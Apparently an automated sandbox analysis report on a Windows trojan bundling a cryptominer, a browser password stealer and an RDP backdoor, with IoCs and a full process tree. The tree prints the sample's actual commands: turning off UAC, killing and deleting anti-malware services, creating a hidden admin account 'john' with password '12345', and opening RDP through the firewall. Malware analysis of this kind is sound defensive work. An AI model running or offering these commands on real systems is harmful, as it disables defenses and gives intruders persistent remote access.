64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b

Analysis

max time kernel
163s
max time network
169s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
26-03-2022 03:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe
Size

10.5MB
MD5

09da7a0456617a66512a87036aafbb8c
SHA1

419bed34eb0b596b593754d49adc54182c684602
SHA256

64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b
SHA512

2fd8a9e3b7aed71a6570a438d139aeb58ff1367a58cff8e9d62c8f7f51d91545baf02e8ca058346f18a22f83b5fa1c229e8f809d020386a767dcd7935b3e962e

Score

10^/10

discovery evasion miner persistence spyware stealer trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/files/0x000500000001e8c5-216.dat	WebBrowserPassView
behavioral2/files/0x000500000001e8c5-213.dat	WebBrowserPassView

Nirsoft 2 IoCs

resource	yara_rule
behavioral2/files/0x000500000001e8c5-216.dat	Nirsoft
behavioral2/files/0x000500000001e8c5-213.dat	Nirsoft

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 22 IoCs

pid	Process
4156	TStart.exe
5000	Cheat.exe
4404	D1.exe
3268	HClean.exe
5024	Temp.exe
1176	R.exe
4584	R8.exe
1464	D64.exe
2284	D32.exe
4904	MOS.exe
4572	P.exe
4552	CHStart.exe
908	M.exe
4640	sc.exe
4368	timeout.exe
920	Cheat64.exe
2108	Rar.exe
4928	ShellExperienceHost.exe
2968	MicrosoftShellHost.exe
4600	Rar.exe
2620	RDPWInst.exe
2812	RDPWInst.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000400000001e7da-157.dat	upx
behavioral2/files/0x000400000001e7da-158.dat	upx
behavioral2/files/0x000400000001e7db-161.dat	upx
behavioral2/files/0x000400000001e7db-162.dat	upx

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MicrosoftShellHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MicrosoftShellHost.exe

Checks computer location settings 2 TTPs 16 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	D32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	R.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	P.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	D1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	D64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	MOS.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	WScript.exe

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner

Loads dropped DLL 2 IoCs

pid	Process
4404	D1.exe
2688	svchost.exe

Modifies file permissions 1 TTPs 14 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2636	icacls.exe
4428	icacls.exe
4232	icacls.exe
1672	icacls.exe
4064	icacls.exe
4504	icacls.exe
5088	icacls.exe
3696	icacls.exe
1168	icacls.exe
4592	icacls.exe
208	icacls.exe
2568	icacls.exe
4176	icacls.exe
2688	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "C:\\ProgramData\\System32\\Logs\\ShellExperienceHost.exe"	ShellExperienceHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

AutoIT Executable 6 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000600000001e7c7-133.dat	autoit_exe
behavioral2/files/0x000600000001e7c7-136.dat	autoit_exe
behavioral2/files/0x000500000001e7c9-174.dat	autoit_exe
behavioral2/files/0x000500000001e7c9-176.dat	autoit_exe
behavioral2/files/0x000500000001e8c4-223.dat	autoit_exe
behavioral2/files/0x000500000001e8c4-224.dat	autoit_exe

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral2/files/0x000500000001e7ca-141.dat	nsis_installer_1
behavioral2/files/0x000500000001e7ca-141.dat	nsis_installer_2
behavioral2/files/0x000500000001e7ca-145.dat	nsis_installer_1
behavioral2/files/0x000500000001e7ca-145.dat	nsis_installer_2

Delays execution with timeout.exe 16 IoCs

evasion

pid	Process
4852	timeout.exe
1828	timeout.exe
1040	timeout.exe
3984	timeout.exe
5044	timeout.exe
612	timeout.exe
4420	timeout.exe
4604	timeout.exe
3020	timeout.exe
936	timeout.exe
3624	timeout.exe
4124	timeout.exe
1440	timeout.exe
4368	timeout.exe
4880	timeout.exe
4920	timeout.exe

Kills process with taskkill 18 IoCs

evasion

pid	Process
2920	taskkill.exe
4280	taskkill.exe
2920	taskkill.exe
3612	taskkill.exe
4232	taskkill.exe
956	taskkill.exe
2436	taskkill.exe
1928	taskkill.exe
3600	taskkill.exe
4848	taskkill.exe
2812	taskkill.exe
1048	taskkill.exe
2012	taskkill.exe
4124	taskkill.exe
2192	taskkill.exe
3696	taskkill.exe
3324	taskkill.exe
4164	taskkill.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	R.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	Cheat.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	P.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	MOS.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2352	reg.exe
2016	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4368	timeout.exe
4368	timeout.exe
4368	timeout.exe
4368	timeout.exe
4368	timeout.exe
4368	timeout.exe
4368	timeout.exe
4368	timeout.exe
4368	timeout.exe
4368	timeout.exe
4368	timeout.exe
4368	timeout.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe
4928	ShellExperienceHost.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
648	Process not Found
648	Process not Found
648	Process not Found

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	3600	taskkill.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	3612	taskkill.exe
Token: SeDebugPrivilege	3696	icacls.exe
Token: SeLockMemoryPrivilege	2968	MicrosoftShellHost.exe
Token: SeDebugPrivilege	3324	taskkill.exe
Token: SeLockMemoryPrivilege	2968	MicrosoftShellHost.exe
Token: SeDebugPrivilege	4848	taskkill.exe
Token: SeDebugPrivilege	2812	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	4232	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	4280	taskkill.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	4164	taskkill.exe
Token: SeDebugPrivilege	4124	taskkill.exe
Token: SeDebugPrivilege	2192	taskkill.exe
Token: SeDebugPrivilege	2436	taskkill.exe
Token: SeAuditPrivilege	3420	svchost.exe
Token: SeDebugPrivilege	2620	RDPWInst.exe
Token: SeAuditPrivilege	2688	svchost.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4904	MOS.exe
4572	P.exe
908	M.exe
4640	sc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 540 wrote to memory of 4288	540	64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe	79
PID 540 wrote to memory of 4288	540	64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe	79
PID 540 wrote to memory of 4288	540	64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe	79
PID 540 wrote to memory of 4156	540	64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe	80
PID 540 wrote to memory of 4156	540	64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe	80
PID 540 wrote to memory of 4156	540	64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe	80
PID 4288 wrote to memory of 4088	4288	WScript.exe	82
PID 4288 wrote to memory of 4088	4288	WScript.exe	82
PID 4288 wrote to memory of 4088	4288	WScript.exe	82
PID 4088 wrote to memory of 5000	4088	cmd.exe	84
PID 4088 wrote to memory of 5000	4088	cmd.exe	84
PID 4088 wrote to memory of 5000	4088	cmd.exe	84
PID 5000 wrote to memory of 4404	5000	Cheat.exe	85
PID 5000 wrote to memory of 4404	5000	Cheat.exe	85
PID 5000 wrote to memory of 4404	5000	Cheat.exe	85
PID 5000 wrote to memory of 3268	5000	Cheat.exe	86
PID 5000 wrote to memory of 3268	5000	Cheat.exe	86
PID 5000 wrote to memory of 3268	5000	Cheat.exe	86
PID 5000 wrote to memory of 5024	5000	Cheat.exe	87
PID 5000 wrote to memory of 5024	5000	Cheat.exe	87
PID 5000 wrote to memory of 5024	5000	Cheat.exe	87
PID 5000 wrote to memory of 1176	5000	Cheat.exe	88
PID 5000 wrote to memory of 1176	5000	Cheat.exe	88
PID 5000 wrote to memory of 1176	5000	Cheat.exe	88
PID 5000 wrote to memory of 4584	5000	Cheat.exe	89
PID 5000 wrote to memory of 4584	5000	Cheat.exe	89
PID 5000 wrote to memory of 4584	5000	Cheat.exe	89
PID 5000 wrote to memory of 4904	5000	Cheat.exe	90
PID 5000 wrote to memory of 4904	5000	Cheat.exe	90
PID 5000 wrote to memory of 4904	5000	Cheat.exe	90
PID 4404 wrote to memory of 1464	4404	D1.exe	91
PID 4404 wrote to memory of 1464	4404	D1.exe	91
PID 4156 wrote to memory of 1524	4156	TStart.exe	92
PID 4156 wrote to memory of 1524	4156	TStart.exe	92
PID 4156 wrote to memory of 1524	4156	TStart.exe	92
PID 4404 wrote to memory of 2284	4404	D1.exe	94
PID 4404 wrote to memory of 2284	4404	D1.exe	94
PID 4404 wrote to memory of 2284	4404	D1.exe	94
PID 5000 wrote to memory of 4572	5000	Cheat.exe	97
PID 5000 wrote to memory of 4572	5000	Cheat.exe	97
PID 5000 wrote to memory of 4572	5000	Cheat.exe	97
PID 4584 wrote to memory of 4280	4584	R8.exe	100
PID 4584 wrote to memory of 4280	4584	R8.exe	100
PID 4584 wrote to memory of 4280	4584	R8.exe	100
PID 1176 wrote to memory of 3468	1176	R.exe	98
PID 1176 wrote to memory of 3468	1176	R.exe	98
PID 1176 wrote to memory of 3468	1176	R.exe	98
PID 5000 wrote to memory of 4552	5000	Cheat.exe	99
PID 5000 wrote to memory of 4552	5000	Cheat.exe	99
PID 5000 wrote to memory of 4552	5000	Cheat.exe	99
PID 2284 wrote to memory of 4520	2284	D32.exe	112
PID 2284 wrote to memory of 4520	2284	D32.exe	112
PID 1464 wrote to memory of 1408	1464	D64.exe	101
PID 1464 wrote to memory of 1408	1464	D64.exe	101
PID 5000 wrote to memory of 1100	5000	Cheat.exe	108
PID 5000 wrote to memory of 1100	5000	Cheat.exe	108
PID 5000 wrote to memory of 1100	5000	Cheat.exe	108
PID 4552 wrote to memory of 2176	4552	CHStart.exe	104
PID 4552 wrote to memory of 2176	4552	CHStart.exe	104
PID 4552 wrote to memory of 2176	4552	CHStart.exe	104
PID 4552 wrote to memory of 3436	4552	CHStart.exe	106
PID 4552 wrote to memory of 3436	4552	CHStart.exe	106
PID 4552 wrote to memory of 3436	4552	CHStart.exe	106
PID 5000 wrote to memory of 2368	5000	Cheat.exe	111

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2028	attrib.exe
1932	attrib.exe
4584	attrib.exe

C:\Users\Admin\AppData\Local\Temp\64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe
"C:\Users\Admin\AppData\Local\Temp\64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:540
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\intel\1.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\microsoft\intel\st.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - \??\c:\programdata\microsoft\intel\Cheat.exe
      Cheat.exe -p123 -dc:\Programdata\microsoft\intel\
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:5000
    - - C:\Programdata\microsoft\intel\D1.exe
        
        "C:\Programdata\microsoft\intel\D1.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:4404
      - C:\Users\Admin\AppData\Roaming\1337\D64.exe
        
        "C:\Users\Admin\AppData\Roaming\1337\D64.exe"
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1464
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9C5D.tmp\9C5E.bat C:\Users\Admin\AppData\Roaming\1337\D64.exe"
        7⤵
        
        PID:1408
        
        C:\Windows\system32\sc.exe
        
        sc delete swprv
        8⤵
        
        PID:5084
        
        C:\Windows\system32\net.exe
        
        net stop MinerGate
        8⤵
        
        PID:2252
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MinerGate
        9⤵
        
        PID:1276
        
        C:\Windows\system32\timeout.exe
        
        timeout 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3624
        
        C:\Windows\system32\sc.exe
        
        sc delete MinerGate
        8⤵
        
        PID:4488
        
        C:\Windows\system32\taskkill.exe
        
        TASKKILL /IM MBAMService.exe /T /F
        8⤵
        Kills process with taskkill
        
        PID:3696
        
        C:\Windows\system32\net.exe
        
        net stop MBAMService
        8⤵
        
        PID:2688
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MBAMService
        9⤵
        
        PID:960
        
        C:\Windows\system32\timeout.exe
        
        timeout 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1828
        
        C:\Windows\system32\sc.exe
        
        sc delete MBAMService
        8⤵
        
        PID:220
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
        8⤵
        
        PID:2876
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
        8⤵
        
        PID:2192
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
        8⤵
        
        PID:3468
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        8⤵
        
        PID:3136
        
        C:\Windows\System32\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        9⤵
        Modifies registry key
        
        PID:2352
      - C:\Users\Admin\AppData\Roaming\1337\D32.exe
        
        "C:\Users\Admin\AppData\Roaming\1337\D32.exe"
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2284
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9C3D.tmp\9C3E.bat C:\Users\Admin\AppData\Roaming\1337\D32.exe"
        7⤵
        
        PID:4520
        
        C:\Windows\system32\sc.exe
        
        sc delete swprv
        8⤵
        
        PID:5052
        
        C:\Windows\system32\net.exe
        
        net stop MinerGate
        8⤵
        
        PID:4048
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MinerGate
        9⤵
        
        PID:2824
        
        C:\Windows\system32\timeout.exe
        
        timeout 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3020
        
        C:\Windows\system32\sc.exe
        
        sc delete MinerGate
        8⤵
        
        PID:4876
        
        C:\Windows\system32\taskkill.exe
        
        TASKKILL /IM MBAMService.exe /T /F
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3612
        
        C:\Windows\system32\net.exe
        
        net stop MBAMService
        8⤵
        
        PID:2364
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MBAMService
        9⤵
        
        PID:2836
        
        C:\Windows\system32\timeout.exe
        
        timeout 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4852
        
        C:\Windows\system32\sc.exe
        
        sc delete MBAMService
        8⤵
        
        PID:408
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
        8⤵
        
        PID:676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
        8⤵
        
        PID:2416
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
        8⤵
        
        PID:532
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        8⤵
        Checks computer location settings
        
        PID:5048
        
        C:\Windows\System32\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        9⤵
        Modifies registry key
        
        PID:2016
    - - C:\Programdata\microsoft\intel\HClean.exe
        
        "C:\Programdata\microsoft\intel\HClean.exe"
        5⤵
        Executes dropped EXE
        
        PID:3268
    - - C:\Programdata\microsoft\intel\Temp.exe
        
        "C:\Programdata\microsoft\intel\Temp.exe"
        5⤵
        Executes dropped EXE
        
        PID:5024
    - - C:\Programdata\microsoft\intel\R.exe
        
        "C:\Programdata\microsoft\intel\R.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:1176
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Log\run.vbs"
        6⤵
        Checks computer location settings
        
        PID:3468
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Log\pause.bat" "
        7⤵
        
        PID:4268
        
        C:\Log\Rar.exe
        
        "Rar.exe" e -p40564203 db.exe
        8⤵
        Executes dropped EXE
        
        PID:2108
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        8⤵
        Delays execution with timeout.exe
        
        PID:4124
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:1040
    - - C:\Programdata\microsoft\intel\R8.exe
        
        "C:\Programdata\microsoft\intel\R8.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4584
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        6⤵
        Checks computer location settings
        
        PID:4280
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        7⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4664
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3600
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:2920
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:5044
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        8⤵
        
        PID:612
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        8⤵
        Executes dropped EXE
        
        PID:4600
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4848
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Executes dropped EXE
        Delays execution with timeout.exe
        Suspicious behavior: EnumeratesProcesses
        
        PID:4368
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        8⤵
        Checks computer location settings
        
        PID:936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        9⤵
        
        PID:3564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        10⤵
        
        PID:448
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        10⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        11⤵
        
        PID:4020
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        10⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        10⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        11⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" "John" /add
        10⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:4556
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
